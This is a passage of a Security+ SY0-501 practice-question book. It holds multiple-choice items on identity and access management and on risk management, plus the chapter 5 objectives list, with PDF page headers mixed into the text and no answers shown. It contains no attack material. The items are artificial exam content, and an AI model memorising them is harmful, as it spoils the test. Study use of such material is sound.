- A. Type I
- B. Type II
- C. Type III
- D. Strong
- 2. Carole is responsible for various network protocols at her company. The network time
- protocol has been intermittently failing. Which of the following would be most affected?
- A. Kerberos
- B. RADIUS
- C. CHAP
- D. LDAP
- 3. You are selecting an authentication method for your company’s servers. You are looking
- for a method that periodically reauthenticates clients to prevent session hijacking. Which
- of the following would be your best choice?
- A. PAP
- B. SPAP
- C. CHAP
- D. OAUTH
- 4. Emiliano is working for a small company. His company is concerned about authentica-
- tion and wants to implement biometrics using facial recognition and fingerprint scanning.
- How would this authentication be classified?
- A. Type I
- B. Type II
- C. Type III
- D. Strong
- 5. Lisa is setting up accounts for her company. She wants to set up accounts for the Oracle
- database server. Which of the following would be the best type of account to assign to the
- database service?
- A. User
- B. Guest
- C. Admin
- D. Service
- 6. You have been asked to select an authentication method that will support single sign-on,
- integrate with SAML, and work well over the Internet. Which of the following would be
- your best choice?
- A. Shibboleth
- B.
- OAUTHChapter 4
- C. SPAP
- D. CHAP
- ■
- Identity and Access Management
- 115
- 7. Which authentication method was used as a native default for older versions of Microsoft
- Windows?
- A. PAP
- B. CHAP
- C. OAUTH
- D. NTLM
- 8. Carl has been asked to set up access control for a server. The requirements state that users
- at a lower privilege level should not be able to see or access files or data at a higher privi-
- lege level. What access control model would best fit these requirements?
- A. MAC
- B. DAC
- C. RBAC
- D. SAML
- 9. Clarice is concerned about an attacker getting information regarding network resources
- in her company. Which protocol should she implement that would be most helpful in miti-
- gating this risk?
- A. LDAP
- B. TLS
- C. SNMP
- D. LDAPS
- 10. Ahmed is looking for an authentication protocol for his network. He is very concerned
- about highly skilled attackers. As part of mitigating that concern, he wants an authentica-
- tion protocol that never actually transmits a user’s password, in any form. Which authen-
- tication protocol would be a good fit for Ahmed’s needs?
- A. CHAP
- B. Kerberos
- C. RBAC
- D. Type II
- 11. You work for a social media website. You wish to integrate your users’ accounts with
- other web resources. To do so, you need to allow authentication to be used across differ-
- ent domains, without exposing your users’ passwords to these other services. Which of the
- following would be most helpful in accomplishing this goal?
- A. Kerberos
- B. SAML
- C. OAUTH
- D. OpenIDChapter 4
- 116
- ■
- Identity and Access Management
- 12. Mary is trying to set up remote access to her network for salespeople in her company.
- Which protocol would be most helpful in accomplishing this goal?
- A. RADIUS
- B. Kerberos
- C. CHAP
- D. OpenID
- 13. Victor is trying to identify the protocol used by Windows for authentication to a server
- that is not part of the network domain. Which of the following would be most useful for
- Victor?
- A. Kerberos
- B. NTLM
- C. OpenID
- D. CHAP
- 14. You have been asked to find an authentication service that is handled by a third party.
- The service should allow users to access multiple websites, as long as they support the
- third-party authentication service. What would be your best choice?
- A. OpenID
- B. Kerberos
- C. NTLM
- D. Shibboleth
- 15. Abigail is implementing biometrics for her company. She is trying to get the false rejection
- rate and false acceptance rate to the same level. What is the term used for this?
- A. Crossover error rate
- B. Leveling
- C. Balanced error rate
- D. Remediation
- 16. Mia is responsible for website security for a bank. When a user forgets their password, she
- wants a method to give them a temporary password. Which of the following would be the
- best solution for this situation?
- A. Facial recognition
- B. Digital certificate authentication
- C. RBAC
- D. TOTP
- 17. George wants a secure authentication protocol that can integrate with RADIUS and can
- use digital certificates. Which of the following would be his best choice?
- A. CHAP
- B.
- 802.11iChapter 4
- C. 802.1x
- D. OAUTH
- ■
- Identity and Access Management
- 117
- 18. Jacob is responsible for database server security in his company. He is very concerned
- about preventing unauthorized access to the databases. Which of the following would be
- the most appropriate for him to implement?
- A. ABAC
- B. TOTP
- C. HIDS
- D. DAMP
- 19. Mason is responsible for security at a company that has traveling salespeople. The com-
- pany has been using ABAC for access control to the network. Which of the following is an
- issue that is specific to ABAC and might cause it to incorrectly reject logins?
- A. Geographic location
- B. Wrong password
- C. Remote access is not allowed by ABAC.
- D. Firewalls usually block ABAC.
- 20. You work for a U.S. defense contractor. You are setting up access cards that have chips
- embedded in them to provide access control for users in your company. Which of the fol-
- lowing types of cards would be best for you to use?
- A. CAC
- B. PIV
- C. NFC
- D. Smart card
- 21. Darrell is concerned that users on his network have too many passwords to remember and
- might write down their passwords, thus creating a significant security risk. Which of the
- following would be most helpful in mitigating this issue?
- A. OAUTH
- B. SSO
- C. OpenID
- D. Kerberos
- 22. Fares is a security administrator for a large company. Occasionally, a user needs to access
- a specific resource that they don’t have permission to access. Which access control meth-
- odology would be most helpful in this situation?
- A. Mandatory Access Control
- B. Discretionary Access Control
- C. Role-based Access Control
- D. Rule-based Access ControlChapter 4
- 118
- ■
- Identity and Access Management
- 23. You are comparing biometric solutions for your company, and the product you pick must
- have an appropriate False Acceptance Rate (FAR). Which of the following best describes
- FAR?
- A. How often an unauthorized user is granted access by mistake
- B. How readily users accept the new technology, based on ease of use
- C. How often an authorized user is not granted access
- D. How frequently the system is offline
- 24. Amelia is looking for a network authentication method that can use digital certificates
- and does not require end users to remember passwords. Which of the following would
- best fit her requirements?
- A. OAUTH
- B. Tokens
- C. OpenID
- D. RBAC
- 25. You are responsible for setting up new accounts for your company network. What is the
- most important thing to keep in mind when setting up new accounts?
- A. Password length
- B. Password complexity
- C. Account age
- D. Least privileges
- 26. Stefan just became the new security officer for a university. He is concerned that student
- workers who work late on campus could try and log in with faculty credentials. Which of
- the following would be most effective in preventing this?
- A. Time of day restrictions
- B. Usage auditing
- C. Password length
- D. Credential management
- 27. Jennifer is concerned that some people in her company have more privileges than they
- should. This has occurred due to people moving from one position to another, and having
- cumulative rights that exceed the requirements of their current jobs. Which of the follow-
- ing would be most effective in mitigating this issue?
- A. Permission auditing
- B. Job rotation
- C. Preventing job rotation
- D. Separation of dutiesChapter 4
- ■
- Identity and Access Management
- 119
- 28. Chloe has noticed that users on her company’s network frequently have simple passwords
- made up of common words. Thus, they have weak passwords. How could Chloe best miti-
- gate this issue?
- A. Increase minimum password length.
- B. Have users change passwords more frequently.
- C. Require password complexity.
- D. Implement Single Sign-On (SSO).
- 29. Bart is looking for a remote access protocol for his company. It is important that the
- solution he selects support multiple protocols and use a reliable network communication
- protocol. Which of the following would be his best choice?
- A. RADIUS
- B. TACACS+
- C. NTLM
- D. CHAP
- 30. You are looking for an authentication method that has one-time passwords and
- works well with the Initiative for Open Authentication. However, the user should
- have unlimited time to use the password. Which of the following would be your best
- choice?
- A. CHAP
- B. TOTP
- C. HOTP
- D. ABAC
- 31. Gerard is trying to find a flexible remote access protocol that can use either TCP or UDP.
- Which of the following should he select?
- A. RADIUS
- B. DIAMETER
- C. TACACS+
- D. TACACS
- 32. Emiliano is considering voice recognition as part of his access control strategy. What is
- one weakness with voice recognition?
- A. People’s voices change.
- B. Systems require training.
- C. High false negative rate
- D. High false positive rateChapter 4
- 120
- ■
- Identity and Access Management
- 33. You are explaining facial recognition to a colleague. What is the most significant draw-
- back to implementing facial recognition?
- A. These systems can be expensive.
- B. These systems can be fooled with facial hair, glasses, etc.
- C. These systems have a high false positive rate.
- D. The systems require a long time to observe a face.
- 34. Mohanned is responsible for account management at his company. He is very concerned
- about hacking tools that rely on rainbow tables. Which of the following would be most
- effective in mitigating this threat?
- A. Password complexity
- B. Password age
- C. Password expiration
- D. Password length
- 35. Mary is a security administrator for a mid-sized company. She is trying to securely off-
- board employees. What should she do with the network account for an employee who is
- being off-boarded?
- A. Disable the account.
- B. Delete the account.
- C. Change the account password.
- D. Leave the account as is.
- 36. Your supervisor tells you to implement security based on your users’ physical characteris-
- tics. Under which type of security would hand scanning and retina scanning fall?
- A. CHAP
- B. Multifactor
- C. Biometrics
- D. Token
- 37. What port does TACACS use?
- A. TCP 143
- B. TCP and UDP 49
- C. TCP 443
- D. UDP 53
- 38. A company-wide policy is being created to define various security levels. Which of the fol-
- lowing systems of access control would use documented security levels like Confidential
- or Secret for information?
- A. RBAC
- B. MAC
- C. DAC
- D. BBCChapter 4
- ■
- Identity and Access Management
- 121
- 39. There is a common security issue that is extremely hard to control in large environments.
- It occurs when a user has more computer rights, permissions, and privileges than what is
- required for the tasks the user needs to fulfill. This is the opposite of what principle?
- A. Separation of duties
- B. Least privileges
- C. Transitive trust
- D. Account management
- 40. Users in your network are able to assign permissions to their own shared resources.
- Which of the following access control models is used in your network?
- A. DAC
- B. RBAC
- C. MAC
- D. ABAC
- 41. John is performing a port scan of a network as part of a security audit. He notices that the
- domain controller is using secure LDAP. Which of the following ports would lead him to
- that conclusion?
- A. 53
- B. 389
- C. 443
- D. 636
- 42. Which of the following access control methods grants permissions based on the user’s
- position in the organization?
- A. MAC
- B. RBAC
- C. DAC
- D. ABAC
- 43. Which of the following can be used as a means for dual-factor authentication?
- A. Password and PIN number
- B. RADIUS and L2TP
- C. LDAP and WPA
- D. Iris scan and password
- 44. Kerberos uses which of the following to issue tickets?
- A. Authentication service
- B. Certificate authority
- C. Ticket-granting service
- D. Key distribution centerChapter 4
- 122
- ■
- Identity and Access Management
- 45. A company requires that a user’s credentials include providing something they know and
- something they are in order to gain access to the network. Which of the following types of
- authentication is being described?
- A. Token
- B. Two-factor
- C. Kerberos
- D. Biometrics
- 46. Samantha is looking for an authentication method that incorporates the X.509 standard
- and will allow authentication to be digitally signed. Which of the following authentication
- methods would best meet these requirements?
- A. Certificate-based authentication
- B. OAUTH
- C. Kerberos
- D. Smart cards
- 47. Your company relies heavily on cloud and SaaS service providers such as salesforce.com,
- Office365, and Google. Which of the following would you have security concerns about?
- A. LDAP
- B. TACACS+
- C. SAML
- D. Transitive trust
- 48. Greg is responsible for database security for his company. He is concerned about authenti-
- cation and permissions. Which of the following should be his first step?
- A. Implement minimum password length.
- B. Implement password lockout.
- C. Conduct a permissions audit.
- D. Ensure least privileges.
- 49. Which of the following is a step in account maintenance?
- A. Implement two-factor authentication.
- B. Check for time of day restrictions.
- C. Review onboarding processes.
- D. Check to see that all accounts are for active employees.
- 50. Tyrell works as a security officer for a mid-sized bank. All the employees only work in the
- office; there are no employees who work remotely or travel for company business. Tyrell
- is concerned about someone using an employee’s login credentials to access the bank’s
- network. Which of the following would be most effective in mitigating this threat?
- A. Kerberos authentication
- B.
- TOTPChapter 4
- C. Location-based policies
- D. Group-based access control
- ■
- Identity and Access Management
- 123
- 51. Henry is an employee at Acme Company. The company requires him to change his
- password every three months. He has trouble remembering new passwords, so he keeps
- switching between just two passwords. Which policy would be most effective in prevent-
- ing this?
- A. Password complexity
- B. Password history
- C. Password length
- D. Password age
- 52. Sheila is concerned that some users on her network may be accessing files that they should
- not—specifically, files that are not required for their job tasks. Which of the following
- would be most effective in determining if this is happening?
- A. Usage auditing and review
- B. Permissions auditing and review
- C. Account maintenance
- D. Policy review
- 53. In which of the following scenarios would using a shared account pose the least security
- risk?
- A. For a group of tech support personnel
- B. For guest Wi-Fi access
- C. For students logging in at a university
- D. For accounts with few privileges
- 54. Which of the following is not a part of password complexity?
- A. Using both uppercase and lowercase letters
- B. Minimum password length
- C. Using numbers
- D. Using symbols (such as $, #, etc.)
- 55. Jane is setting up login accounts for federated identities. She wants to avoid requiring
- the users to remember login credentials and allow them to use their logins from the
- originating network. Which of the following technologies would be most suitable for
- implementing this?
- A. Credential management
- B. OAUTH
- C. Kerberos
- D. ShibbolethChapter 4
- 124
- ■
- Identity and Access Management
- 56. Sam is responsible for password management at a large company. Sometimes users cannot
- recall their passwords. What would be the best solution for him to address this?
- A. Changing password history length
- B. Implementing password recovery
- C. Eliminating password complexity
- D. Lengthening password age
- 57. You are a security administrator for an insurance company. You have discovered that
- there are a few active accounts for employees who left the company over a year ago.
- Which of the following would best address this issue?
- A. Password complexity
- B. Offboarding procedures
- C. Onboarding procedures
- D. Password expiration
- 58. Maria is responsible for security at a small company. She is concerned about unauthorized
- devices being connected to the network. She is looking for a device authentication process.
- Which of the following would be the best choice for her?
- A. CHAP
- B. Kerberos
- C. 802.11i
- D. 802.1x
- 59. Laura is a security admin for a mid-sized mortgage company. She wants to ensure that the
- network is using the most secure login and authentication scheme possible. Which of the
- following would be her best choice?
- A. Iris scanning
- B. Fingerprint scanning
- C. Multifactor authentication
- D. Smart cards
- 60. Charles is a CISO for an insurance company. He recently read about an attack wherein
- an attacker was able to enumerate all the network resources, and was able to make some
- resources unavailable. All this was done by exploiting a single protocol. Which protocol
- should Charles secure to mitigate this attack?
- A. SNMP
- B. LDAP
- C. HTTP
- D. DHCP
- 61. Robert is using PAP for authentication in his network. What is the most significant weak-
- ness in PAP?
- A. Unsigned authentication
- B.
- Single factorChapter 4
- C. Credentials sent in cleartext
- D. PAP does not support TACACS+.
- ■
- Identity and Access Management
- 125
- 62. You are responsible for account access control and authorization at a large university.
- There are approximately 30,000 students and 1,200 faculty/staff for whom you must
- manage accounts. Which of the following would be the best access control/account man-
- agement approach?
- A. Group-based
- B. Location-based
- C. MAC
- D. DAC
- 63. Which of the following is most important in managing account permissions?
- A. Account recertification
- B. Usage auditing
- C. Standard naming conventions
- D. Account recovery
- 64. Which of the following would be the best choice for naming the account of John Smith,
- who is a domain administrator?
- A. dm_jsmith
- B. jsmithAdmin
- C. AdministratorSmith
- D. jsmith
- 65. Megan is very concerned about file system security on her network servers. Which of the
- following is the most basic form of file system security?
- A. Encryption
- B. Access control
- C. Auditing
- D. RAID
- 66. Karen is responsible for account security in her company. She has discovered a reception-
- ist whose account has a six-character password that has not been changed in two years,
- and her password history is not being maintained. What is the most significant problem
- with this account?
- A. Nothing, this is adequate for a low-security position.
- B. The password length is the most significant problem.
- C. The lack of password history is the most significant problem.
- D. The age of the password is the most significant problem.Chapter 4
- 126
- ■
- Identity and Access Management
- 67. When you’re offboarding an employee, which of the following is the first thing you should do?
- A. Audit their computer.
- B. Conduct an out-processing questionnaire.
- C. Disable accounts.
- D. Delete accounts.
- 68. Which of the following is a difference between TACACS and TACACS+?
- A. TACACS uses TCP, TACACS+ uses UDP
- B. TACACS uses UDP, TACACS+ uses TCP
- C. TACACS uses TCP or UDP, TACACS+ uses UDP
- D. TACACS uses UDP, TACACS+ uses UDP or TCP
- 69. Greg is considering using CHAP or MS-CHAPv2 for authenticating remote users. Which
- of the following is a major difference between the two protocols?
- A. CHAP uses a hash for the challenge, MS-CHAPv2 uses AES.
- B. CHAP provides mutual authentication, MS-CHAPv2 does not.
- C. CHAP uses AES for the challenge, MS-CHAPv2 uses a hash.
- D. MS-CHAPv2 provides mutual authentication, CHAP does not.
- 70. Terrance is looking for a physical access solution that uses asymmetric cryptography (pub-
- lic key cryptography) to authorize the user. What type of solution is this?
- A. Asynchronous password token
- B. Challenge response token
- C. TOTP token
- D. Static password token
- 71. Which access control model is based on the Trusted Computer System Evaluation Criteria
- (TCSEC)?
- A. ABAC
- B. MAC
- C. RBAC
- D. DAC
- 72. Mary is responsible for the security of database servers at a mortgage company. The serv-
- ers are Windows Server 2016. She is concerned about file system security. Which of the
- following Microsoft features would be most helpful to her in implementing file system
- security?
- A. Password policies
- B. EFS
- C. Account lockout
- D. UACChapter 4
- ■
- Identity and Access Management
- 127
- 73. Santiago manages database security for a university. He is concerned about ensuring that
- appropriate security measures are implemented. Which of the following would be most
- important to database security?
- A. Password policies
- B. Antivirus
- C. EFS
- D. Access control policies
- 74. Ingrid is reviewing her company’s recertification policy. Which of the following is the best
- reason to recertify?
- A. To audit usage
- B. To enhance onboarding
- C. To audit permissions
- D. To manage credentials
- 75. Emma is concerned about credential management. Users on her network often have over a
- half-dozen passwords to remember. She is looking for a solution to this problem. Which of
- the following would be the best way to address this issue?
- A. Implement a manager.
- B. Use shorter passwords.
- C. Implement OAUTH.
- D. Implement Kerberos.
- 76. Magnus is concerned about someone using a password cracker on computers in his com-
- pany. He is concerned that crackers will attempt common passwords in order to log in to
- a system. Which of the following would be best for mitigating this threat?
- A. Password age restrictions
- B. Password minimum length requirements
- C. Account lockout policies
- D. Account usage auditing
- 77. Lucas is looking for an XML-based open standard for exchanging authentication infor-
- mation. Which of the following would best meet his needs?
- A. SAML
- B. OAUTH
- C. RADIUS
- D. NTLMChapter 4
- 128
- ■
- Identity and Access Management
- 78. Which of the following processes transpires when a user provides a correct username and
- password?
- A. Identification
- B. Authentication
- C. Authorization
- D. Accounting
- 79. Min-seo is looking for a type of access control that enforces authorization rules by the
- operating system. Users cannot override authentication or access control policies. Which
- of the following best fits this description?
- A. DAC
- B. MAC
- C. RBAC
- D. ABAC
- 80. Hinata is considering biometric access control solutions for her company. She is concerned
- about the crossover error rate (CER). Which of the following most accurately describes
- the CER?
- A. The rate of false acceptance
- B. The rate of false rejection
- C. The point at which false rejections outpace false acceptances
- D. The point at which false rejections and false acceptances are equal
- 81. Joshua is looking for an authentication protocol that would be effective at stopping ses-
- sion hijacking. Which of the following would be his best choice?
- A. CHAP
- B. PAP
- C. SPAP
- D. RADIUS
- 82. David is trying to select an authentication method for his company. He needs one that will
- support REST as well as multiple web-based and mobile clients. Which of the following
- would be his best choice?
- A. Shibboleth
- B. RADIUS
- C. OpenID Connect
- D. OAuth
- 83. Phillip is examining options for controlling physical access to the server room at his com-
- pany. He wants a hands-free solution. Which of the following would be his best choice?
- A. Smart cards
- B.
- Proximity cardsChapter 4
- C. Tokens
- D. Fingerprint scanner
- ■
- Identity and Access Management
- 84. Which of the following is the most significant disadvantage of federated identities?
- A. They cannot be used with Kerberos.
- B. They don’t implement least privileges.
- C. Poor password management
- D. Transitive trust
- 85. Max is implementing type II authentication for his company. Which of the following
- would be an example of type II authentication?
- A. Strong passwords
- B. Retinal scan
- C. Smart cards
- D. Timed one-time passwords
- 86. Nicole is implementing a server authentication method that depends on a TPM in the
- server. Which of the following best describes this approach?
- A. Hardware-based access control
- B. Software-based access control
- C. Digital certificate–based access control
- D. Chip-based access control
- 129Chapter
- 5
- Risk Management
- The CompTIA Security+ Exam
- SY0-501 topics covered in this
- chapter include the following:
- ✓ ✓ 5.1 Explain the importance of policies, plans and
- procedures related to organizational security.
- ■ ■ Standard operating procedure
- ■ ■ Agreement types
- ■ ■
- ■ ■ BPA
- ■ ■ SLA
- ■ ■ ISA
- ■ ■ MOU/MOA
- Personnel management
- ■ ■ Mandatory vacations
- ■ ■ Jot rotation
- ■ ■ Separation of duties
- ■ ■ Clean desk
- ■ ■ Background checks
- ■ ■ Exit interviews
- ■ ■ Role-based awareness training
- ■ ■ Data owner
- ■ ■ System administrator
- ■ ■ System owner
- ■ ■ User
- ■ ■ Privileged user
- ■ ■ Executive user
- ■ ■ NDA
- ■ ■ Onboarding
- ■ ■ Continuing education
- ■ ■ Acceptable use policy/rules of behavior
- ■ ■ Adverse actions■ ■
- General security policies
- ■ ■ Social media networks/applications
- ■ ■ Personal email
- ✓ ✓ 5.2 Summarize business impact analysis concepts.
- ■ ■ RTO/RPO
- ■ ■ MTBF
- ■ ■ MTTR
- ■ ■ Mission-essential functions
- ■ ■ Identification of critical systems
- ■ ■ Single point of failure
- ■ ■ Impact
- ■ ■ Life
- ■ ■ Property
- ■ ■ Safety
- ■ ■ Finance
- ■ ■ Reputation
- ■ ■ Privacy impact assessment
- ■ ■ Privacy threshold assessment
- ✓ ✓ 5.3
- ■ ■
- Explain risk management processes and concepts.
- Threat assessment
- ■ ■ Environmental
- ■ ■ Manmade
- ■ ■ Internal vs external
- ■ ■ Risk assessment
- ■ ■ SLE
- ■ ■ ALE
- ■ ■ ARO
- ■ ■ Asset value
- ■ ■ Risk register
- ■ ■ Likelihood of occurrence
- ■ ■ Supply chain assessment
- ■ ■ Impact
- ■ ■ Quantitative■ ■ Qualitative
- ■ ■ Testing
- ■ ■
- ■ ■
- ■ ■ Penetration testing authorization
- ■ ■ Vulnerability testing authorization
- Risk response techniques
- ■ ■ Accept
- ■ ■ Transfer
- ■ ■ Avoid
- ■ ■ Mitigate
- Change Management
- ✓ ✓ 5.4 Given a scenario, follow incident response procedures.
- ■ ■
- ■ ■
- ✓ ✓ 5.5
- Incident response plan
- ■ ■ Documented incident types/category definitions
- ■ ■ Roles and responsibilities
- ■ ■ Reporting requirements/escalation
- ■ ■ Cyber-incident response teams
- ■ ■ Exercise
- Incident response process
- ■ ■ Preparation
- ■ ■ Identification
- ■ ■ Containment
- ■ ■ Eradication
- ■ ■ Recovery
- ■ ■ Lessons learned
- Summarize basic concepts of forensics.
- ■ ■ Order of volatility
- ■ ■ Chain of custody
- ■ ■ Legal hold
- ■ ■ Data acquisition
- ■ ■ Capture system image
- ■ ■ Network traffic and logs
- ■ ■ Capture video
- ■ ■ Record time offset■ ■ Take hashes
- ■ ■ Screenshots
- ■ ■ Witness interviews
- ■ ■ Preservation
- ■ ■ Recovery
- ■ ■ Strategic intelligence/counterintelligence gathering
- ■ ■
- ■ ■
- Active logging
- Track man-hours
- ✓ ✓ 5.6 Explain disaster recovery and continuity of operation
- concepts.
- ■ ■
- Recovery sites
- ■ ■ Hot site
- ■ ■ Warm site
- ■ ■ Cold site
- ■ ■ Order of restoration
- ■ ■ Backup concepts
- ■ ■
- ■ ■
- ■ ■ Differential
- ■ ■ Incremental
- ■ ■ Snapshots
- ■ ■ Full
- Geographic considerations
- ■ ■ Off-site backups
- ■ ■ Distance
- ■ ■ Location selection
- ■ ■ Legal implications
- ■ ■ Data sovereignty
- Continuity of operation planning
- ■ ■ Exercises/tabletop
- ■ ■ After-action reports
- ■ ■ Failover
- ■ ■ Alternate processing sites
- ■ ■ Alternate business practices✓ ✓ 5.7 Compare and contrast various types of controls.
- ■ ■ Deterrent
- ■ ■ Preventive
- ■ ■ Detective
- ■ ■ Corrective
- ■ ■ Compensating
- ■ ■ Technical
- ■ ■ Administrative
- ■ ■ Physical
- ✓ ✓ 5.8 Given a scenario, carry out data security and privacy
- practices.
- ■ ■
- ■ ■
- ■ ■
- Data destruction and media sanitization
- ■ ■ Burning
- ■ ■ Shredding
- ■ ■ Pulping
- ■ ■ Pulverizing
- ■ ■ Degaussing
- ■ ■ Purging
- ■ ■ Wiping
- Data sensitivity labeling and handling
- ■ ■ Confidential
- ■ ■ Private
- ■ ■ Public
- ■ ■ Proprietary
- ■ ■ PII
- ■ ■ PHI
- Data roles
- ■ ■ Owner
- ■ ■ Steward/custodian
- ■ ■ Privacy officer
- ■ ■ Data retention
- ■ ■ Legal and complianceChapter 5
- 136
- ■
- Risk Management
- 1. You are a manager of a bank and you suspect one of your tellers has stolen money from
- their station. After talking with your supervisor, you place the employee on leave with
- pay, suspend their computer account, and obtain their proximity card and keys to the
- building. Which of the following policies did you follow?
- A. Mandatory vacations
- B. Exit interviews
- C. Adverse actions
- D. Onboarding
- 2. Which of the following principles stipulates that multiple changes to a computer system
- should not be made at the same time?
- A. Due diligence
- B. Acceptable use
- C. Change management
- D. Due care
- 3. Why are penetration test often not advised?
- A. It can be disruptive for the business activities.
- B. It is able to measure and authenticate the efficiency of a company’s defensive
- mechanisms.
- C. It’s able to find both known and unknown hardware or software weaknesses.
- D. It permits the exploration of real risks and gives a precise depiction of a company’s IT
- infrastructure security posture at any given time.
- 4. You are a security engineer and discovered an employee using the company’s computer
- systems to operate their small business. The employee installed their personal software
- on the company’s computer and is using the computer hardware, such as the USB port.
- What policy would you recommend the company implement to prevent any risk of the
- company’s data and network being compromised?
- A. Acceptable use policy
- B. Clean desk policy
- C. Mandatory vacation policy
- D. Job rotation policy
- 5. What should be done to back up tapes that are stored off-site?
- A. Generate a file hash for each backup file.
- B. Scan the backup data for viruses.
- C. Perform a chain of custody on the backup tape.
- D. Encrypt the backup data.
- 6. Which recovery site is the easiest to test?
- A. Warm site
- B.
- Cold siteChapter 5
- C. Hot site
- D. Medium site
- ■
- Risk Management
- 137
- 7. Katelyn is a network technician for a manufacturing company. She is testing a network
- forensic capturing software and plugs her laptop into an Ethernet switch port and
- begins capturing network traffic. Later she begins to analyze the data and notices some
- broadcast and multicast packets, as well as her own laptop’s network traffic. Which of
- the following statements best describes why Katelyn was unable to capture all network
- traffic on the switch?
- A. Each port on the switch is an isolated broadcast domain.
- B. Each port on the switch is an isolated collision domain.
- C. Promiscuous mode must be enabled on the NIC.
- D. Promiscuous mode must be disabled on the NIC.
- 8. Which of the following is not a step of the incident response process?
- A. Snapshot
- B. Preparation
- C. Recovery
- D. Containment
- 9. Which of the following is another term for technical controls?
- A. Access controls
- B. Logical controls
- C. Detective controls
- D. Preventive controls
- 10. You are a security manager for your company and need to reduce the risk of employees
- working in collusion to embezzle funds. Which of the following policies would you
- implement?
- A. Mandatory vacations
- B. Clean desk
- C. NDA
- D. Continuing education
- 11. You are a security administrator, and your manager has asked you about protecting
- the privacy of personally identifiable information (PII) that is collected. Which of the
- following would be the best option to fulfill the request?
- A. PIA
- B. BIA
- C. RTO
- D. SPFChapter 5
- 138
- ■
- Risk Management
- 12. Which of the following plans best identifies critical systems and components to ensure the
- assets are protected?
- A. DRP
- B. BCP
- C. IT contingency plan
- D. Succession plan
- 13. After your company implemented a clean desk policy, you have been asked to secure
- physical documents every night. Which of the following would be the best solution?
- A. Department door lock
- B. Locking cabinets and drawers
- C. Proximity card
- D. Onboarding
- 14. Your manager has instructed the team to test certain systems based on the business
- continuity plan to ensure they are operating properly. The manager wants to ensure there
- are no overlaps in the plan before implementing the test. Which continuity of operation
- planning concept is your manager referring to?
- A. After-action report
- B. Failover
- C. Eradication
- D. Tabletop exercise
- 15. Which of the following is an example of PHI?
- A. Passport number
- B. Criminal record
- C. Fingerprints
- D. Name of school attended
- 16. Which of the following techniques attempts to predict the likelihood a threat will occur
- and assigns monetary values should a loss occur?
- A. Change management
- B. Vulnerability assessment
- C. Qualitative risk assessment
- D. Quantitative risk assessment
- 17. Your competitors are offering a new service that is predicted to sell strong. After much
- careful research, your company has decided not to launch a competing service due to the
- uncertainty of the market and the enormous investment required. Which of the following
- best describes the company’s decision?
- A. Risk transfer
- B.
- Risk avoidanceChapter 5
- C. Risk acceptance
- D. Risk mitigation
- ■
- Risk Management
- 139
- 18. Which of the following agreements is less formal than a traditional contract but still has a
- certain level of importance to all parties involved?
- A. SLA
- B. BPA
- C. ISA
- D. MOU
- 19. Your company is considering moving its mail server to a hosting company. This will help
- reduce hardware and server administrator costs at the local site. Which of the following
- documents would formally state the reliability and recourse if the reliability is not met?
- A. MOU
- B. SLA
- C. ISA
- D. BPA
- 20. You have an asset that is valued at $16,000, the exposure factor of a risk affecting that
- asset is 35%, and the annualized rate of occurrence if 75%. What is the SLE?
- A. $5,600
- B. $5,000
- C. $4,200
- D. $3,000
- 21. During a meeting, you present management with a list of access controls used on your
- network. Which of the following controls is an example of a corrective control?
- A. IDS
- B. Audit logs
- C. Antivirus software
- D. Router
- 22. You are the new security administrator and have discovered your company lacks deterrent
- controls. Which of the following would you install that satisfies your needs? (Choose
- two.)
- A. Lighting
- B. Motion sensor
- C. No trespassing signs
- D. Antivirus scannerChapter 5
- 140
- ■
- Risk Management
- 23. Your company’s security policy includes system testing and security awareness training
- guidelines. Which of the following control types is this?
- A. Detective technical control
- B. Preventive technical control
- C. Detective administrative control
- D. Preventive administrative control
- 24. Which step of the incident response process occurs after containment?
- A. Preparation
- B. Recovery
- C. Identification
- D. Eradication
- 25. You are a security administrator for your company and you identify a security risk. You
- decide to continue with the current security plan. However, you develop a contingency
- plan in case the security risk occurs. Which of the following type of risk response
- technique are you demonstrating?
- A. Accept
- B. Transfer
- C. Avoid
- D. Mitigate
- 26. Which of the following best visually shows the state of a computer at the time it was
- collected by law enforcement?
- A. Screenshots
- B. Identification
- C. Tabletop exercise
- D. Generate hash values
- 27. You are asked to protect the company’s data should a complete disaster occur. Which
- action would be the best option for this request?
- A. Back up all data to tape, and store those tapes at an alternate location within the city.
- B. Back up all data to tape, and store those tapes at an alternate location in another city.
- C. Back up all data to disk, and store the disk in a safe in the company’s basement.
- D. Back up all data to disk, and store the disk in a safe at the network administrator’s
- home.
- 28. Which of the following would not be a purpose of a privacy threshold analysis?
- A. Identify programs and systems that are privacy-sensitive.
- B. Demonstrate the inclusion of privacy considerations during the review of a program
- or system.
- C. Identify systems that are considered a single point of failure.
- D. Demonstrate compliance with privacy laws and regulations.Chapter 5
- ■
- Risk Management
- 141
- 29. You have purchased new laptops for your salespeople. You plan to dispose of the hard
- drives of the former laptops as part of a company computer sale. Which of the following
- methods would you use to properly dispose of the hard drives?
- A. Destruction
- B. Shredding
- C. Purging
- D. Formatting
- 30. You are the head of the IT department of a school and are looking for a way to promote
- safe and responsible use of the Internet for students. With the help of the teachers, you
- develop a document for students to sign that describes methods of accessing the Internet
- on the school’s network. Which of the following best describes this document?
- A. Service level agreement
- B. Acceptable use policy
- C. Incident response plan
- D. Chain of custody
- 31. You are the security administrator and have discovered a malware incident. Which of the
- following responses should you do first?
- A. Recovery
- B. Eradication
- C. Containment
- D. Identification
- 32. You are an IT administrator for a company and you are adding new employees to an
- organization’s identity and access management system. Which of the following best
- describes the process you are performing?
- A. Onboarding
- B. Offboarding
- C. Adverse action
- D. Job rotation
- 33. Your company is partnering with another company and requires systems to be shared.
- Which of the following agreements would outline how the shared systems should be
- interfaced?
- A. BPA
- B. MOU
- C. SLA
- D. ISAChapter 5
- 142
- ■
- Risk Management
- 34. Mark is an office manager at a local bank branch. He wants to ensure customer informa-
- tion isn’t compromised when the deskside employees are away from their desks for the
- day. What security concept would Mark use to mitigate this concern?
- A. Clean desk
- B. Background checks
- C. Continuing education
- D. Job rotation
- 35. You are a security administrator and advise the web development team to include a
- CAPTCHA on the web page where users register for an account. Which of the following
- controls is this referring to?
- A. Deterrent
- B. Detective
- C. Compensating
- D. Degaussing
- 36. Which of the following is not a common security policy type?
- A. Acceptable use policy
- B. Social media policy
- C. Password policy
- D. Parking policy
- 37. As the IT security officer, you are configuring data label options for your company’s
- research and development file server. Regular users can label documents as contractor,
- public, or internal. Which label should be assigned to company trade secrets?
- A. High
- B. Top secret
- C. Proprietary
- D. Low
- 38. Users are currently accessing their personal email through company computers, so you
- and your IT team have created a security policy for email use. What is the next step after
- creating and approving the email use policy?
- A. Encrypt all user email messages.
- B. Provide security user awareness training.
